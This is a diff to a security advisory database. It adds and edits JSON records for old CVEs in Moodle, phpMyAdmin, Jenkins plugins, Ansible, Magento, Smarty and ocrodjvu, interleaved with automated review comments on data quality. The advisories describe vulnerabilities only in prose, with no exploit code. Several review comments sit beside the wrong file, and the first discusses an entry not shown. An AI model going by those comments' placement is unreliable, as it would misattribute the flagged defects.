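Review bot: The last added affected entry gives `zendframework/zend-http` the range `introduced 0` / `fixed 1.12.12`, which is exactly the ZF1 range the preceding entry assigns to `zendframework/zendframework1`; it reads like a copy of that entry with only the package name changed. zend-http's own affected versions are already captured by the `2.0.0beta4`–`2.3.8` and `2.4.0rc1`–`2.4.1` entries in the first hunk, so unless a 1.x line of `zendframework/zend-http` exists on Packagist this block matches nothing real and should be dropped. The `affected` array is only partly visible across these hunks.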
diff --git a/advisories/github-reviewed/2022/05/GHSA-5j25-5hjr-w7m2/GHSA-5j25-5hjr-w7m2.json b/advisories/github-reviewed/2022/05/GHSA-5j25-5hjr-w7m2/GHSA-5j25-5hjr-w7m2.json index 3abe26ec70a58..5b93897ba0bf9 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5j25-5hjr-w7m2/GHSA-5j25-5hjr-w7m2.json +++ b/advisories/github-reviewed/2022/05/GHSA-5j25-5hjr-w7m2/GHSA-5j25-5hjr-w7m2.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7951" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7951.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json b/advisories/github-reviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json new file mode 100644 index 0000000000000..700fb23764488 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json 
@@ -0,0 +1,120 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jph-mvfm-r27p", + "modified": "2024-01-29T02:52:10Z", + "published": "2022-05-13T01:12:43Z", + "aliases": [ + "CVE-2015-0218" + ], + "summary": "Moodle cross-site request forgery (CSRF) vulnerability", + "details": "Cross-site request forgery (CSRF) vulnerability in auth/shibboleth/logout.php in Moodle through 2.5.9, 2.6.x before 2.6.7, 2.7.x before 2.7.4, and 2.8.x before 2.8.2 allows remote attackers to hijack the authentication of arbitrary users for requests that trigger a logout.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0218" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/371d58d70d4ef866f35e33ea6898007112bfe654" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/693918c30e6b7c95dddd9c5973f98d98342a59d9" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/b82b4c562b705ea8f11893d9126889bb696b9612" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/fb60e23a67931eeba8fc9aacf3cc838e462f21f2" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moodle/moodle" + }, + { + "type": "WEB", + "url": "https://moodle.org/mod/forum/discuss.php?d=278618" + }, + { + "type": "WEB", + "url": 
"http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-47964" + }, + { + "type": "WEB", + "url": "http://openwall.com/lists/oss-security/2015/01/19/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T02:52:10Z", + "nvd_published_at": "2015-06-01T19:59:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json b/advisories/github-reviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json new file mode 100644 index 0000000000000..c7534aa53e7c1 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pjj-7m4p-wfh2", + "modified": "2024-02-07T22:40:09Z", + "published": "2022-05-17T02:04:28Z", + "aliases": [ + "CVE-2010-4338" + ], + "summary": "ocrodjvu is vulnerable to Arbitrary File Modification via symlink attack", + "details": "ocrodjvu 0.4.6-1 on Debian GNU/Linux allows local users to modify arbitrary files via a symlink attack on temporary files that are generated when Cuneiform is invoked as the OCR engine.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ocrodjvu" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.4.6-1" + }, + { + "fixed": "0.4.6-2" + } + ] + } + ], + "versions": [ + "0.4.6-1" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4338" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64892" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jwilk-archive/ocrodjvu" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200229160520/http://www.securityfocus.com/bid/45234" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=598134" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:40:09Z", + "nvd_published_at": "2011-01-20T19:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json b/advisories/github-reviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json new file mode 100644 index 0000000000000..b2a86ab871d89 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json 
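Review bot: The range `introduced 0.4.6-1` / `fixed 0.4.6-2` and the `versions` entry `0.4.6-1` are Debian package revisions (the details themselves say "0.4.6-1 on Debian GNU/Linux"), not PyPI releases. Under PEP 440 `0.4.6-1` normalizes to the post-release `0.4.6.post1`, so a PyPI consumer would match no published release and the upstream `0.4.6` distribution would be treated as unaffected. Either record the affected upstream versions of `ocrodjvu` (the Debian bug report referenced below should indicate whether the temporary-file handling is upstream code or only Debian packaging), or move this entry out of the `PyPI` ecosystem.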
@@ -0,0 +1,149 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pvv-f8h3-gw96", + "modified": "2024-02-08T22:02:35Z", + "published": "2022-05-02T03:47:43Z", + "aliases": [ + "CVE-2009-3696" + ], + "summary": "phpMyAdmin Cross-site Scripting In MySQL Table Name", + "details": "Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name for a MySQL table.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmyadmin/phpmyadmin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.11.0" + }, + { + "fixed": "2.11.9.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "phpmyadmin/phpmyadmin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.2.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3696" + }, + { + "type": "WEB", + "url": "https://github.com/phpmyadmin/phpmyadmin/commit/212daad0c082dfb853e3a4098838781a96b2ce1f" + }, + { + "type": "WEB", + "url": "https://github.com/phpmyadmin/phpmyadmin/commit/8ec5434999724f61d7df1f9b0b13545274c78b1e" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=528769" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53742" + }, + { + "type": "PACKAGE", + "url": "https://github.com/phpmyadmin/phpmyadmin" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228173112/http://www.securityfocus.com/bid/36658" + }, + { + "type": "WEB", + "url": "https://www.redhat.com/archives/fedora-package-announce/2009-October/msg00467.html" + }, + { + "type": "WEB", + "url": "https://www.redhat.com/archives/fedora-package-announce/2009-October/msg00490.html" + }, + { + "type": "WEB", + "url": 
"http://bugs.gentoo.org/show_bug.cgi?id=288899" + }, + { + "type": "WEB", + "url": "http://dfn.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/2.11.9.6/phpMyAdmin-2.11.9.6-notes.html" + }, + { + "type": "WEB", + "url": "http://dfn.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.2.2.1/phpMyAdmin-3.2.2.1-notes.html" + }, + { + "type": "WEB", + "url": "http://freshmeat.net/projects/phpmyadmin/releases/306667" + }, + { + "type": "WEB", + "url": "http://freshmeat.net/projects/phpmyadmin/releases/306669" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125553728512853&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125561979001460&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/extensions/repository/view/phpmyadmin/4.5.0/" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-015/" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:274" + }, + { + "type": "WEB", + "url": "http://www.phpmyadmin.net/home_page/security/PMASA-2009-6.php" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T22:02:34Z", + "nvd_published_at": "2009-10-16T16:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json b/advisories/github-reviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json new file mode 100644 index 0000000000000..504456a09b9eb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5q7j-8hpc-4848", + "modified": "2024-01-30T22:11:16Z", + "published": "2022-05-14T01:38:17Z", + "aliases": [ + "CVE-2018-1000421" + ], + "summary": "Server-side request forgery vulnerability in Jenkins Mesos Plugin", + "details": "An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to initiate a test connection to an attacker-specified Mesos server with attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:mesos" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.17.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000421" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1013%20(2)" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:11:16Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5qp6-78pr-gv8c/GHSA-5qp6-78pr-gv8c.json b/advisories/github-reviewed/2022/05/GHSA-5qp6-78pr-gv8c/GHSA-5qp6-78pr-gv8c.json index bd810f537a5be..8860f21238932 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5qp6-78pr-gv8c/GHSA-5qp6-78pr-gv8c.json +++ b/advisories/github-reviewed/2022/05/GHSA-5qp6-78pr-gv8c/GHSA-5qp6-78pr-gv8c.json 
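Review bot: The `http://www.securityfocus.com/bid/106532` reference is recorded as a bare link, while other new files in this commit (GHSA-5pjj-7m4p-wfh2, GHSA-5pvv-f8h3-gw96, GHSA-6667-f46p-pg88) record the same kind of BID reference as a web.archive.org snapshot, which suggests the live site no longer resolves; the same bare form also appears in GHSA-5v2j-w677-j4mp, GHSA-63cj-3r94-234v, GHSA-65cq-whr4-7c2v and GHSA-687x-269m-7cv9. Either form is acceptable, but mixing them within one commit makes downstream link checking inconsistent. Separately, `cwe_ids` is `CWE-918` while the details describe an improper authorization issue that lets a user with Overall/Read capture stored credentials; CWE-862 alongside, or instead of, CWE-918 may classify it better — worth confirming against the Jenkins advisory.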
@@ -29,10 +29,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.2.2" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.2.0" + }, + { + "fixed": "6.2.6" + } + ] + } + ] } ], "references": [ @@ -44,10 +60,22 @@ "type": "WEB", "url": "https://github.com/openid/php-openid/commit/625c16bb28bb120d262b3f19f89c2c06cb9b0da9" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/openid/php-openid/CVE-2013-4701.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2013-4701.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/openid/php-openid" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2014-002" + }, { "type": "WEB", "url": "http://jvn.jp/en/jp/JVN24713981/index.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json b/advisories/github-reviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json new file mode 100644 index 0000000000000..d14106e16d756 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5v2j-w677-j4mp", + "modified": "2024-01-30T22:26:51Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003027" + ], + "summary": "SSRF vulnerability due to missing permission check in Jenkins OctopusDeploy Plugin ", + "details": "A server-side request forgery vulnerability exists in Jenkins OctopusDeploy Plugin 1.8.1 and earlier in OctopusDeployPlugin.java that allows attackers with Overall/Read permission to have Jenkins connect to an attacker-specified URL and obtain the HTTP response code if successful, and exception error message otherwise.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins.octopusdeploy:octopusdeploy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.9.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.8.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003027" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-817" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107295" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:26:51Z", + "nvd_published_at": "2019-02-20T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5v5p-x8c2-mqxp/GHSA-5v5p-x8c2-mqxp.json b/advisories/github-reviewed/2022/05/GHSA-5v5p-x8c2-mqxp/GHSA-5v5p-x8c2-mqxp.json index 1b932388169ab..ec6035e568a18 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5v5p-x8c2-mqxp/GHSA-5v5p-x8c2-mqxp.json +++ b/advisories/github-reviewed/2022/05/GHSA-5v5p-x8c2-mqxp/GHSA-5v5p-x8c2-mqxp.json 
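Review bot: The `summary` string ends in a trailing space (`"... in Jenkins OctopusDeploy Plugin "`), which will surface verbatim in any UI or feed that renders the field; the same trailing space is present in the summary of GHSA-65rj-cgrp-g65w. Trimming it is a one-character change: `"summary": "SSRF vulnerability due to missing permission check in Jenkins OctopusDeploy Plugin",`.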
@@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8122" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8122.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json b/advisories/github-reviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json new file mode 100644 index 0000000000000..4664c21993c7d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-63cj-3r94-234v", + "modified": "2024-01-30T22:36:03Z", + "published": "2022-05-17T00:29:01Z", + "aliases": [ + "CVE-2017-1000103" + ], + "summary": "Persistent XSS vulnerability in Jenkins DRY Plugin", + "details": "The custom Details view of the Static Analysis Utilities based DRY Plugin, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to this plugin could insert arbitrary HTML into this view.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:dry" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.49" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.48" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000103" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/101061" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:03Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json b/advisories/github-reviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json new file mode 100644 index 0000000000000..dd1a3cfd3a1ae --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json 
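Review bot: The CVSS vector here carries `PR:L` while GHSA-65cq-whr4-7c2v, a same-template persisted XSS from the same 2017-08-07 Jenkins advisory, carries `PR:N`; both describe "malicious users able to influence the input to this plugin", so one of the two privilege ratings looks inconsistent. These vectors are presumably copied from NVD, so the right fix is to confirm which value NVD publishes for each CVE rather than to edit by hand.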
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-64cw-m57j-65xj", + "modified": "2024-01-30T23:55:58Z", + "published": "2022-05-17T19:57:30Z", + "aliases": [ + "CVE-2014-4967" + ], + "summary": "Ansible Arbitrary Code Execution", + "details": "Multiple argument injection vulnerabilities in Ansible before 1.6.7 allow remote attackers to execute arbitrary code by leveraging access to an Ansible managed host and providing a crafted fact, as demonstrated by a fact with (1) a trailing \" src=\" clause, (2) a trailing \" temp=\" clause, or (3) a trailing \" validate=\" clause accompanied by a shell command.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ansible" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4967" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/62a1295a3e08cb6c3e9f1b2a1e6e5dcaeab32527" + }, + { + "type": "WEB", + "url": "http://www.ocert.org/advisories/ocert-2014-004.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:55:58Z", + "nvd_published_at": "2020-02-18T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-653q-vqm6-gmjm/GHSA-653q-vqm6-gmjm.json b/advisories/github-reviewed/2022/05/GHSA-653q-vqm6-gmjm/GHSA-653q-vqm6-gmjm.json index e19ed2bd3b8cc..d02d3f9a1e89b 100644 --- a/advisories/github-reviewed/2022/05/GHSA-653q-vqm6-gmjm/GHSA-653q-vqm6-gmjm.json +++ b/advisories/github-reviewed/2022/05/GHSA-653q-vqm6-gmjm/GHSA-653q-vqm6-gmjm.json 
@@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8090" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8090.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json b/advisories/github-reviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json new file mode 100644 index 0000000000000..5dc80521b27a9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-65cq-whr4-7c2v", + "modified": "2024-01-30T22:33:48Z", + "published": "2022-05-17T00:32:26Z", + "aliases": [ + "CVE-2017-1000109" + ], + "summary": "Persistent XSS vulnerability in Jenkins OWASP Dependency-Check Plugin", + "details": "The custom Details view of the Static Analysis Utilities based OWASP Dependency-Check Plugin, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to this plugin could insert arbitrary HTML into this view.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:dependency-check-jenkins-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.1.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.0.1.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000109" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/100227" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:33:48Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-65j5-vpm7-6xp4/GHSA-65j5-vpm7-6xp4.json b/advisories/github-reviewed/2022/05/GHSA-65j5-vpm7-6xp4/GHSA-65j5-vpm7-6xp4.json index 7a4d45f56a126..d95fe8e5a0d91 100644 --- a/advisories/github-reviewed/2022/05/GHSA-65j5-vpm7-6xp4/GHSA-65j5-vpm7-6xp4.json +++ b/advisories/github-reviewed/2022/05/GHSA-65j5-vpm7-6xp4/GHSA-65j5-vpm7-6xp4.json 
@@ -28,7 +28,7 @@ "introduced": "0" }, { - "fixed": "3.1.33-dev-4" + "fixed": "3.1.33" } ] } @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/f9ca3c63d1250bb56b2bda609dcc9dd81f0065f8" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2018-16831.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty" diff --git a/advisories/github-reviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json b/advisories/github-reviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json new file mode 100644 index 0000000000000..51b7948518cb7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json 
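Review bot: Changing `fixed` from `3.1.33-dev-4` to `3.1.33` widens the affected range to include every `3.1.33-dev-N` pre-release tag, which is a behavioural change rather than a cleanup. If those dev tags already contain the fix commit `f9ca3c63d1250bb56b2bda609dcc9dd81f0065f8` referenced in the second hunk, they are now reported as vulnerable; if the motivation is that `3.1.33-dev-4` is not a version string Composer can normalise, that is worth stating in the commit description so the widening is understood as deliberate. The enclosing `events` array starts before the hunk.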
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-65rj-cgrp-g65w", + "modified": "2024-01-30T21:20:03Z", + "published": "2022-05-24T16:55:01Z", + "aliases": [ + "CVE-2019-10391" + ], + "summary": "Jenkins IBM AppScan Plugin showed plain text password in job configuration form fields ", + "details": "Jenkins IBM Application Security on Cloud Plugin 1.2.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure. This plugin has bee deprecated.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.hcl.security:ibm-application-security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.2.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.2.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10391" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-28/#SECURITY-1512" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/28/4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:20:03Z", + "nvd_published_at": "2019-08-28T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json b/advisories/github-reviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json new file mode 100644 index 0000000000000..b6a3058e0e506 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json 
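Review bot: The `details` string contains the typo "This plugin has bee deprecated"; it should read `This plugin has been deprecated.` Since this text is shown to users in the advisory feed, it is worth fixing before the file is published.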
